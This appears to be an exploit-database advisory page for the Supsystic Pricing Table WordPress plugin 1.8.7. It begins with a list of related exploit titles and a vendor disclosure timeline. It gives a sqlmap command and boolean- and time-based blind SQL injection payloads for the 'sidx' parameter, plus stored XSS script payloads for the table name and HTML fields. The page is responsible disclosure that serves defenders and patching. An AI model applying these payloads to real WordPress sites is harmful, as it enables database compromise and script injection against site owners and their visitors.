84533192ae
19 changes to exploits/shellcodes SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution SmartFoxServer 2X 2.17.0 - Credentials Disclosure Millewin 13.39.146.1 - Local Privilege Escalation AMD Fuel Service - 'Fuel.service' Unquote Service Path Microsoft Internet Explorer 11 32-bit - Use-After-Free SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS Jenzabar 9.2.2 - 'query' Reflected XSS. WordPress Plugin Welcart e-Commerce 2.0.0 - 'search[order_column][0]' SQL injection WordPress Plugin Supsystic Ultimate Maps 1.1.12 - 'sidx' SQL injection WordPress Plugin Supsystic Pricing Table 1.8.7 - Multiple Vulnerabilities YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery Alt-N MDaemon webmail 20.0.0 - 'Contact name' Stored Cross Site Scripting (XSS) Alt-N MDaemon webmail 20.0.0 - 'file name' Stored Cross Site Scripting (XSS) WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion
61 lines
No EOL
2.4 KiB
Text
61 lines
No EOL
2.4 KiB
Text
# Exploit Title: WordPress Plugin Supsystic Pricing Table 1.8.7 - Multiple Vulnerabilities
|
|
# Date: 24/07/2020
|
|
# Exploit Author: Erik David Martin
|
|
# Vendor Homepage: https://supsystic.com/
|
|
# Software Link: https://downloads.wordpress.org/plugin/pricing-table-by-supsystic.1.8.7.zip
|
|
# Version: 1.8.7 and 1.8.6
|
|
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2
|
|
|
|
# 25/07 2020: Vendor notified
|
|
# 27/07 2020: Vendor requested detailed information
|
|
# 27/07 2020: Information provided
|
|
# 07/08 2020: Nudged vendor. No reply
|
|
# 22/08 2020: Nudged vendor. No reply
|
|
# 04/10 2020: Nudged vendor. No reply
|
|
# 29/11 2020: WordPress Plugin Security team contacted
|
|
# 07/12 2020: Vulnerability patched
|
|
|
|
|
|
##################################
|
|
SQLi
|
|
##################################
|
|
|
|
|
|
# 1. Description
|
|
|
|
The GET parameter "sidx" does not sanitize user input when searching for existing pricing tables.
|
|
|
|
|
|
# 2. Proof of Concept (PoC)
|
|
|
|
Use ZAP/Burp to capture the web request when searching for existing pricing tables and save it to request.txt
|
|
Referer: http://192.168.0.49/wp-admin/admin.php?page=supsystic-tables&module=tables
|
|
|
|
sqlmap -r request.txt --dbms=mysql -p sidx
|
|
|
|
Parameter: sidx (GET)
|
|
Type: boolean-based blind
|
|
Payload: mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=2893fe633b&search[text_like]=test&_search=false&nd=1595624411398&rows=10&page=0&sidx=(SELECT (CASE WHEN (5313=5313) THEN 0x6964 ELSE (SELECT 9338 UNION SELECT 5490) END))&sord=desc
|
|
|
|
Type: time-based blind
|
|
Payload: mod=tables&action=getListForTbl&pl=pts&reqType=ajax&pts_nonce=2893fe633b&search[text_like]=test&_search=false&nd=1595624411398&rows=10&page=0&sidx=id AND (SELECT 9475 FROM (SELECT(SLEEP(5)))OjhB)&sord=desc
|
|
|
|
|
|
|
|
##################################
|
|
Stored XSS
|
|
##################################
|
|
|
|
|
|
# 1. Description
|
|
|
|
The "Edit name" and "Edit HTML" features are vulnerable to stored XXS.
|
|
Location: http://192.168.0.49/wp-admin/admin.php?page=tables-supsystic&tab=tables_edit&id=[TABLE ID]
|
|
|
|
|
|
# 2. Proof of Concept (PoC)
|
|
|
|
Enter the following payload into the "Edit" field in the top left corner: "><script>alert(1)</script><!--'
|
|
The payload will execute when viewing the pricing table itself, and also in the "Show All Tables" section.
|
|
Enter the following payload into the "Edit HTML" section in the top right corner: <script>alert(1)</script><!--
|
|
The payload will get stored and will execute everytime the user attempts to view the pricing table. |